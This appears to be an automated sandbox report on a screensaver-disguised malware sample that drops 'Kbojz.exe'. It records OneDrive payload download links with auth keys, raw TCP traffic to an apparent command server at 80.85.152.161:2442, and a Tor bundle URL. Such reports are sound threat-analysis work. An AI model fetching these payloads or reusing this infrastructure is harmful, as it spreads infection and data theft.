Source:	Binary string: protobuf-net.pdbSHA256}Lq source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.359012875.0000000004190000.00000004.08000000.00040000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356858296.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356481377.0000000002436000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.424766179.0000000003925000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.424766179.0000000003BE0000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.407176401.00000000025FD000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.410066207.0000000003301000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.420766544.0000000002577000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000005.00000002.471133740.0000000002362000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\projects\dotnetzip-semverd\src\Zip\obj\Release\DotNetZip.pdb source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.434522188.0000000006180000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.359012875.0000000004190000.00000004.08000000.00040000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356858296.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356481377.0000000002436000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.424766179.0000000003925000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.424766179.0000000003BE0000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.407176401.00000000025FD000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.410066207.0000000003301000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.420766544.0000000002577000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000005.00000002.471133740.0000000002362000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: p@costura.dotnetzip.pdb.compressed source: Kbojz.exe, 00000005.00000002.471133740.0000000002362000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Code function: 4x nop then jmp 01EF7B2Bh	0_2_01EF7928
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Code function: 4x nop then jmp 01EF7B2Bh	0_2_01EF7919
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Code function: 4x nop then jmp 01EF8FEFh	0_2_01EF9085
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Code function: 4x nop then jmp 01EF8FEFh	0_2_01EF8F88
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h	0_2_01F09970
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h	0_2_01F09978
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	0_2_04C8D900
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Code function: 4x nop then jmp 020F8FEFh	3_2_020F9085
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Code function: 4x nop then jmp 020F7B2Bh	3_2_020F7919
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Code function: 4x nop then jmp 020F7B2Bh	3_2_020F7928
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Code function: 4x nop then jmp 020F8FEFh	3_2_020F8F88
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h	3_2_021A917A
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h	3_2_021A9180
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	3_2_052CD900
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Code function: 4x nop then jmp 02018FEFh	4_2_02019085
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Code function: 4x nop then jmp 02017B2Bh	4_2_02017919
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Code function: 4x nop then jmp 02017B2Bh	4_2_02017928
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Code function: 4x nop then jmp 02018FEFh	4_2_02018F88
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h	4_2_0203917B
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h	4_2_02039180
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	4_2_0540D900

Source: global traffic

TCP traffic: 192.168.2.22:49174 -> 80.85.152.161:2442

Source: global traffic	HTTP traffic detected: GET /download?resid=26943FEBC022618F%21479&authkey=!APRD0RAPKJuy4WE HTTP/1.1Host: onedrive.live.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download?resid=26943FEBC022618F%21479&authkey=!APRD0RAPKJuy4WE HTTP/1.1Host: onedrive.live.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download?resid=26943FEBC022618F%21479&authkey=!APRD0RAPKJuy4WE HTTP/1.1Host: onedrive.live.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download?resid=26943FEBC022618F%21479&authkey=!APRD0RAPKJuy4WE HTTP/1.1Host: onedrive.live.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download?resid=26943FEBC022618F%21481&authkey=!AJjxgOKv6NEIF-A HTTP/1.1Host: onedrive.live.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download?resid=26943FEBC022618F%21481&authkey=!AJjxgOKv6NEIF-A HTTP/1.1Host: onedrive.live.comConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 150.171.41.11 150.171.41.11
Source: Joe Sandbox View	IP Address: 13.107.137.11 13.107.137.11

Source: Joe Sandbox View	JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: Joe Sandbox View	JA3 fingerprint: 36f7277af969a6947a61ae0b815907a1

Source: unknown	TCP traffic detected without corresponding DNS query: 80.85.152.161
Source: unknown	TCP traffic detected without corresponding DNS query: 80.85.152.161
Source: unknown	TCP traffic detected without corresponding DNS query: 80.85.152.161
Source: unknown	TCP traffic detected without corresponding DNS query: 80.85.152.161
Source: unknown	TCP traffic detected without corresponding DNS query: 80.85.152.161
Source: unknown	TCP traffic detected without corresponding DNS query: 80.85.152.161
Source: unknown	TCP traffic detected without corresponding DNS query: 80.85.152.161
Source: unknown	TCP traffic detected without corresponding DNS query: 80.85.152.161
Source: unknown	TCP traffic detected without corresponding DNS query: 80.85.152.161
Source: unknown	TCP traffic detected without corresponding DNS query: 80.85.152.161
Source: unknown	TCP traffic detected without corresponding DNS query: 80.85.152.161
Source: unknown	TCP traffic detected without corresponding DNS query: 80.85.152.161
Source: unknown	TCP traffic detected without corresponding DNS query: 80.85.152.161
Source: unknown	TCP traffic detected without corresponding DNS query: 80.85.152.161
Source: unknown	TCP traffic detected without corresponding DNS query: 80.85.152.161
Source: unknown	TCP traffic detected without corresponding DNS query: 80.85.152.161
Source: unknown	TCP traffic detected without corresponding DNS query: 80.85.152.161
Source: unknown	TCP traffic detected without corresponding DNS query: 80.85.152.161
Source: unknown	TCP traffic detected without corresponding DNS query: 80.85.152.161
Source: unknown	TCP traffic detected without corresponding DNS query: 80.85.152.161
Source: unknown	TCP traffic detected without corresponding DNS query: 80.85.152.161
Source: unknown	TCP traffic detected without corresponding DNS query: 80.85.152.161
Source: unknown	TCP traffic detected without corresponding DNS query: 80.85.152.161
Source: unknown	TCP traffic detected without corresponding DNS query: 80.85.152.161
Source: unknown	TCP traffic detected without corresponding DNS query: 80.85.152.161
Source: unknown	TCP traffic detected without corresponding DNS query: 80.85.152.161
Source: unknown	TCP traffic detected without corresponding DNS query: 80.85.152.161
Source: unknown	TCP traffic detected without corresponding DNS query: 80.85.152.161
Source: unknown	TCP traffic detected without corresponding DNS query: 80.85.152.161
Source: unknown	TCP traffic detected without corresponding DNS query: 80.85.152.161
Source: unknown	TCP traffic detected without corresponding DNS query: 80.85.152.161
Source: unknown	TCP traffic detected without corresponding DNS query: 80.85.152.161
Source: unknown	TCP traffic detected without corresponding DNS query: 80.85.152.161
Source: unknown	TCP traffic detected without corresponding DNS query: 80.85.152.161
Source: unknown	TCP traffic detected without corresponding DNS query: 80.85.152.161
Source: unknown	TCP traffic detected without corresponding DNS query: 80.85.152.161
Source: unknown	TCP traffic detected without corresponding DNS query: 80.85.152.161
Source: unknown	TCP traffic detected without corresponding DNS query: 80.85.152.161
Source: unknown	TCP traffic detected without corresponding DNS query: 80.85.152.161
Source: unknown	TCP traffic detected without corresponding DNS query: 80.85.152.161
Source: unknown	TCP traffic detected without corresponding DNS query: 80.85.152.161
Source: unknown	TCP traffic detected without corresponding DNS query: 80.85.152.161
Source: unknown	TCP traffic detected without corresponding DNS query: 80.85.152.161
Source: unknown	TCP traffic detected without corresponding DNS query: 80.85.152.161
Source: unknown	TCP traffic detected without corresponding DNS query: 80.85.152.161
Source: unknown	TCP traffic detected without corresponding DNS query: 80.85.152.161
Source: unknown	TCP traffic detected without corresponding DNS query: 80.85.152.161
Source: unknown	TCP traffic detected without corresponding DNS query: 80.85.152.161
Source: unknown	TCP traffic detected without corresponding DNS query: 80.85.152.161
Source: unknown	TCP traffic detected without corresponding DNS query: 80.85.152.161

Source: global traffic	HTTP traffic detected: GET /download?resid=26943FEBC022618F%21479&authkey=!APRD0RAPKJuy4WE HTTP/1.1Host: onedrive.live.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download?resid=26943FEBC022618F%21479&authkey=!APRD0RAPKJuy4WE HTTP/1.1Host: onedrive.live.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download?resid=26943FEBC022618F%21479&authkey=!APRD0RAPKJuy4WE HTTP/1.1Host: onedrive.live.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download?resid=26943FEBC022618F%21479&authkey=!APRD0RAPKJuy4WE HTTP/1.1Host: onedrive.live.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download?resid=26943FEBC022618F%21481&authkey=!AJjxgOKv6NEIF-A HTTP/1.1Host: onedrive.live.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download?resid=26943FEBC022618F%21481&authkey=!AJjxgOKv6NEIF-A HTTP/1.1Host: onedrive.live.comConnection: Keep-Alive

Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356276020.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.434205628.00000000060E2000.00000004.00000020.00020000.00000000.sdmp

String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: unknown

DNS traffic detected: queries for: onedrive.live.com

Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356276020.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.434205628.00000000060E2000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.406017200.000000000051B000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.419345105.0000000000568000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.485746581.00000000056CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356276020.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.434205628.00000000060CA000.00000004.00000020.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.434205628.00000000060E2000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.406017200.000000000051B000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.419345105.0000000000568000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.485746581.00000000056CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356276020.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.434205628.00000000060E2000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.406017200.000000000051B000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.419345105.0000000000568000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.485746581.00000000056CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356276020.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.434205628.00000000060E2000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.406017200.000000000051B000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.419345105.0000000000568000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.485746581.00000000056CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356276020.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.434205628.00000000060E2000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.406017200.000000000051B000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.419345105.0000000000568000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.485746581.00000000056CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356276020.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.434205628.00000000060E2000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.406017200.000000000051B000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.419345105.0000000000568000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.485746581.00000000056CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356276020.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.434205628.00000000060E2000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.406017200.000000000051B000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.419345105.0000000000568000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.485746581.00000000056CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, Kbojz.exe.0.dr	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: Kbojz.exe, 00000006.00000002.478817595.000000000246E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://dual-spov-0006.spov-dc-msedge.net
Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.420675930.000000000244C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://dual-spov-0006.spov-msedge.net
Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.420675930.0000000002481000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://l-0003.l-msedge.net
Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356276020.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.434205628.00000000060E2000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.406017200.000000000051B000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.419345105.0000000000568000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.485746581.00000000056CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356276020.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.434205628.00000000060CA000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.406017200.000000000051B000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.419345105.0000000000568000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.485746581.00000000056CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356276020.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.434205628.00000000060E2000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.406017200.000000000051B000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.419345105.0000000000568000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.485746581.00000000056CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356276020.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.434205628.00000000060E2000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.406017200.000000000051B000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.419345105.0000000000568000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.485746581.00000000056CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356276020.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.434205628.00000000060CA000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.406017200.000000000051B000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.419345105.0000000000568000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.485746581.00000000056CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356276020.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.434205628.00000000060E2000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.406017200.000000000051B000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.419345105.0000000000568000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.485746581.00000000056CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356276020.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.434205628.00000000060E2000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.406017200.000000000051B000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.419345105.0000000000568000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.485746581.00000000056CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, Kbojz.exe.0.dr	String found in binary or memory: http://ocsp.thawte.com0
Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.420675930.000000000244C000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.478817595.000000000246E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://onedrive.live.com
Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, Kbojz.exe.0.dr	String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, Kbojz.exe.0.dr	String found in binary or memory: http://s.symcd.com06
Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, Kbojz.exe.0.dr	String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, Kbojz.exe.0.dr	String found in binary or memory: http://s2.symcb.com0
Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356481377.00000000020E1000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.420675930.0000000002432000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.407176401.00000000022D1000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.420766544.000000000221D000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.478817595.0000000002453000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, Kbojz.exe.0.dr	String found in binary or memory: http://sv.symcb.com/sv.crl0a
Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, Kbojz.exe.0.dr	String found in binary or memory: http://sv.symcb.com/sv.crt0
Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, Kbojz.exe.0.dr	String found in binary or memory: http://sv.symcd.com0&
Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, Kbojz.exe.0.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, Kbojz.exe.0.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, Kbojz.exe.0.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, Kbojz.exe.0.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, Kbojz.exe.0.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, Kbojz.exe.0.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.420675930.0000000002481000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://utqurw.am.files.1drv.com
Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, Kbojz.exe.0.dr	String found in binary or memory: http://www.apple.com/
Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.434522188.0000000006180000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://www.codeplex.com/DotNetZip
Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356276020.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.434205628.00000000060E2000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.406017200.000000000051B000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.419345105.0000000000568000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.485746581.00000000056CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356276020.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.434205628.00000000060E2000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.406017200.000000000051B000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.419345105.0000000000568000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.485746581.00000000056CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: Uwdvtizbx.tmpdb.2.dr	String found in binary or memory: http://www.mozilla.org/2005/made-up-favicon/0-1508238359936
Source: Eiakizpyayx.tmpdb.6.dr, Uwdvtizbx.tmpdb.2.dr	String found in binary or memory: http://www.mozilla.org/2005/made-up-favicon/1-1508238359942
Source: Eiakizpyayx.tmpdb.6.dr, Uwdvtizbx.tmpdb.2.dr	String found in binary or memory: http://www.mozilla.org/2005/made-up-favicon/2-1508238359945
Source: Eiakizpyayx.tmpdb.6.dr, Uwdvtizbx.tmpdb.2.dr	String found in binary or memory: http://www.mozilla.org/2005/made-up-favicon/3-1508238359948
Source: Eiakizpyayx.tmpdb.6.dr, Uwdvtizbx.tmpdb.2.dr	String found in binary or memory: http://www.mozilla.org/2005/made-up-favicon/4-1508238359950
Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, Kbojz.exe.0.dr	String found in binary or memory: http://www.symauth.com/cps0(
Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, Kbojz.exe.0.dr	String found in binary or memory: http://www.symauth.com/rpa00
Source: Oazzuwge.tmpdb.6.dr, Stygcpda.tmpdb.6.dr, Zlxloj.tmpdb.2.dr, Buyeg.tmpdb.2.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.420675930.0000000002251000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000005.00000002.471133740.0000000002362000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.478817595.0000000002271000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://archive.torproject.org/tor-package-archive/torbrowser/13.0.9/tor-expert-bundle-windows-i686-
Source: Oazzuwge.tmpdb.6.dr, Stygcpda.tmpdb.6.dr, Zlxloj.tmpdb.2.dr, Buyeg.tmpdb.2.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, Kbojz.exe.0.dr	String found in binary or memory: https://d.symcb.com/cps0%
Source: Kbojz.exe.0.dr	String found in binary or memory: https://d.symcb.com/rpa0
Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, Kbojz.exe.0.dr	String found in binary or memory: https://d.symcb.com/rpa0.
Source: Oazzuwge.tmpdb.6.dr, Stygcpda.tmpdb.6.dr, Zlxloj.tmpdb.2.dr, Buyeg.tmpdb.2.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Oazzuwge.tmpdb.6.dr, Stygcpda.tmpdb.6.dr, Zlxloj.tmpdb.2.dr, Buyeg.tmpdb.2.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
